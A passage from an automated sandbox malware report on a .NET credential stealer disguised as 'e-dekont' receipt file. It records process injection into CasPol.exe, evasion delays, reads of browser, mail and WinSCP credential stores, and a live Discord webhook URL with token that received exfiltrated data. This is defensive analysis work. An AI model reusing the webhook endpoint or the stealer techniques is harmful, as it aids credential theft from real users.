        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1198078
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1197963
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1197843
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1197734
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1197625
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1197516
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1197405
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1197280
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1197162
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1197000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1196891
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1196779
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1196638
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1196531
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1196422
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1196309
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1196203
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1196093
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1195984
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1195875
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1195765
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1195656
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1195547
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1195432
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1195312
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1195203
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1195078
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1194953
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1194843
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1194734
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1194625
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1194499
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1194391
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1194279
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1194172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1194062
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1193931
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 9641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: CasPol.exe, 00000001.00000003.312026803.0000000005BA2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process token adjusted: Debug
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42C000
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42E000
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 754008
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Queries volume information: C:\Users\user\Desktop\e-dekont-20230207.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6100, type: MEMORYSTR
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6100, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match | File source: 00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6100, type: MEMORYSTR
        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | 211 Windows Management Instrumentation | Path Interception | 311 Process Injection | 1 Disable or Modify Tools | 1 OS Credential Dumping | 114 System Information Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 3 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Deobfuscate/Decode Files or Information | 11 Input Capture | 111 Security Software Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | 1 Credentials in Registry | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 22 Software Packing | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 11 Input Capture | Scheduled Transfer | 15 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 Remote System Discovery | SSH | 1 Clipboard Data | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Masquerading | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
        External Remote Services | Scheduled Task | Startup Items | Startup Items | 131 Virtualization/Sandbox Evasion | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 311 Process Injection | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

        Source | Detection | Scanner | Label | Link
        e-dekont-20230207.exe | 26% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal
        e-dekont-20230207.exe | 100% | Joe Sandbox ML
        No Antivirus matches
        Source | Detection | Scanner | Label | Link | Download
        1.2.CasPol.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203035 | Download File
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        https://discord.com | 0% | URL Reputation | safe
        http://discord.com | 0% | URL Reputation | safe
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr | 0% | Avira URL Cloud | safe
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31 | 0% | Avira URL Cloud | safe
        https://discord.com4Dp | 0% | Avira URL Cloud | safe
        NameIPActiveMaliciousAntivirus DetectionReputation
        discord.com
        162.159.128.233
        truetrue
          unknown
          api4.ipify.org
          64.185.227.155
          truefalse
            high
            api.ipify.org
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
                high
                https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osrtrue
                • Avira URL Cloud: safe
                unknown
Name | Source | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | ---
https://api.ipify.org | CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com | CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://discord.com | CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com4Dp | CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31 | CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
162.159.128.233 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
64.185.227.155 | api4.ipify.org | United States | 18450 | WEBNXUS | false
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 800710
Start date and time: 2023-02-07 18:30:27 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: e-dekont-20230207.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@3/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 17.7% (good quality ratio 15.8%)
• Quality average: 62.8%
• Quality standard deviation: 34.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 50
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: e-dekont-20230207.exe
Time | Type | Description
--- | --- | ---
18:31:29 | API Interceptor | 951x Sleep call for process: CasPol.exe modified
Process: C:\Users\user\Desktop\e-dekont-20230207.exe
File Type: CSV text
Category: dropped
Size (bytes): 226
Entropy (8bit): 5.354940450065058
Encrypted: false
SSDEEP: 6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5: B10E37251C5B495643F331DB2EEC3394
SHA1: 25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256: 8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512: 296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
File type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.965063063447085
TrID:
• Win64 Executable GUI Net Framework (217006/5) 47.53%
• Win64 Executable GUI (202006/5) 44.25%
• Win64 Executable (generic) Net Framework (21505/4) 4.71%
• Win64 Executable (generic) (12005/4) 2.63%
• Generic Win/DOS Executable (2004/3) 0.44%
File name: e-dekont-20230207.exe
File size: 688128
MD5: 2fbaa4d917cce04617f24f87309286d6
SHA1: 7480ce7aebd7f59da7d6bd4f9eb7bba0efe05f97
SHA256: 91eb17a8906ebbe9c50ef6a509e80133fd3322aec9b84e04cc5925992235c17e
SHA512: a2776ed384951898f491546f1050a26f744701c86478865e277288d5b639723f3d96a0cb8ca3e77941155d4fafc67970f4c2b713d0e16894ca58e3f3be718825
SSDEEP: 12288:OEc+106G5pJptT7f98u1548XTTtSXIK4798qdGxd3rb5Oi4W21q1ni/:O1+1pG5znHz151ntSM9zEd3rb58H1Wg
TLSH: 76E42212724F57BBE6296071C8FB087B13B57305A533D8A9BF1C12886F84B5B6E99F40
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....!..................r............... ....@...... ....................................@................................
Icon Hash: 00828e8e8686b000
Entrypoint: 0x400000
Entrypoint Section:
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x9521C718 [Wed Apr 14 13:14:00 2049 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash:
                                                            Instruction
                                                            dec ebp
                                                            pop edx
                                                            nop
                                                            add byte ptr [ebx], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax+eax], al
                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
--- | --- | --- | ---
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xac000 | 0x598 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa9158 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
--- | --- | --- | --- | --- | --- | --- | --- | ---
.text | 0x2000 | 0xa71f4 | 0xa7200 | False | 0.9709777603777113 | data | 7.972775066304571 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata | 0xaa000 | 0x1e8 | 0x200 | False | 0.861328125 | data | 6.632870559527538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xac000 | 0x598 | 0x600 | False | 0.4147135416666667 | data | 4.06869988795393 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
--- | --- | --- | --- | --- | ---
RT_VERSION | 0xac0a0 | 0x30c | data | |
RT_MANIFEST | 0xac3ac | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
--- | --- | --- | --- | --- | --- | --- | ---
02/07/23-18:31:33.991128 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49690 | 443 | 192.168.2.5 | 162.159.128.233
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 7, 2023 18:31:28.926114082 CET | 54949 | 53 | 192.168.2.5 | 8.8.8.8
Feb 7, 2023 18:31:28.946228027 CET | 53 | 54949 | 8.8.8.8 | 192.168.2.5
Feb 7, 2023 18:31:28.960350037 CET | 58218 | 53 | 192.168.2.5 | 8.8.8.8
Feb 7, 2023 18:31:28.980236053 CET | 53 | 58218 | 8.8.8.8 | 192.168.2.5
Feb 7, 2023 18:31:33.830131054 CET | 60998 | 53 | 192.168.2.5 | 8.8.8.8
Feb 7, 2023 18:31:33.850213051 CET | 53 | 60998 | 8.8.8.8 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 7, 2023 18:31:28.926114082 CET | 192.168.2.5 | 8.8.8.8 | 0x4145 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Feb 7, 2023 18:31:28.960350037 CET | 192.168.2.5 | 8.8.8.8 | 0x96d5 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Feb 7, 2023 18:31:33.830131054 CET | 192.168.2.5 | 8.8.8.8 | 0x3a38 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 7, 2023 18:31:28.946228027 CET | 8.8.8.8 | 192.168.2.5 | 0x4145 | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Feb 7, 2023 18:31:28.946228027 CET | 8.8.8.8 | 192.168.2.5 | 0x4145 | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 18:31:28.946228027 CET | 8.8.8.8 | 192.168.2.5 | 0x4145 | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 18:31:28.946228027 CET | 8.8.8.8 | 192.168.2.5 | 0x4145 | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 18:31:28.980236053 CET | 8.8.8.8 | 192.168.2.5 | 0x96d5 | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Feb 7, 2023 18:31:28.980236053 CET | 8.8.8.8 | 192.168.2.5 | 0x96d5 | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 18:31:28.980236053 CET | 8.8.8.8 | 192.168.2.5 | 0x96d5 | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 18:31:28.980236053 CET | 8.8.8.8 | 192.168.2.5 | 0x96d5 | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 18:31:33.850213051 CET | 8.8.8.8 | 192.168.2.5 | 0x3a38 | No error (0) | discord.com | - | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 18:31:33.850213051 CET | 8.8.8.8 | 192.168.2.5 | 0x3a38 | No error (0) | discord.com | - | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 18:31:33.850213051 CET | 8.8.8.8 | 192.168.2.5 | 0x3a38 | No error (0) | discord.com | - | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 18:31:33.850213051 CET | 8.8.8.8 | 192.168.2.5 | 0x3a38 | No error (0) | discord.com | - | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 18:31:33.850213051 CET | 8.8.8.8 | 192.168.2.5 | 0x3a38 | No error (0) | discord.com | - | 162.159.135.232 | A (IP address) | IN (0x0001) | false
                                                            • api.ipify.org
                                                            • discord.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49689 | 64.185.227.155 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp | kBytes transferred | Direction | Data
2023-02-07 17:31:29 UTC | 0 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2023-02-07 17:31:29 UTC | 0 | IN | HTTP/1.1 200 OK
Content-Length: 11
Content-Type: text/plain
Date: Tue, 07 Feb 2023 17:31:29 GMT
Vary: Origin
Connection: close
2023-02-07 17:31:29 UTC | 0 | IN | Data Raw: 38 34 2e 31 37 2e 35 32 2e 31 33
Data Ascii: 84.17.52.13


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49690 | 162.159.128.233 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp | kBytes transferred | Direction | Data
2023-02-07 17:31:33 UTC | 0 | OUT | POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1
Content-Type: multipart/form-data; boundary=----------0d40611c92ae4655a6dec63fbd8447e1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: discord.com
Content-Length: 1224
Expect: 100-continue
Connection: Keep-Alive
2023-02-07 17:31:33 UTC | 0 | IN | HTTP/1.1 100 Continue
2023-02-07 17:31:33 UTC | 0 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 64 34 30 36 31 31 63 39 32 61 65 34 36 35 35 61 36 64 65 63 36 33 66 62 64 38 34 34 37 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 6e 61 6d 65 22 0d 0a 0d 0a 61 6c 66 6f 6e 73 2d 39 32 38 31 30 30 20 32 30 32 33 2d 30 32 2d 30 38 20 30 31 2d 33 31 2d 30 30 2e 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 64 34 30 36 31 31 63 39 32 61 65 34 36 35 35 61 36 64 65 63 36 33 66 62 64 38 34 34 37 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 66 6f 72 6d 61 74 22 0d 0a 0d 0a 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30
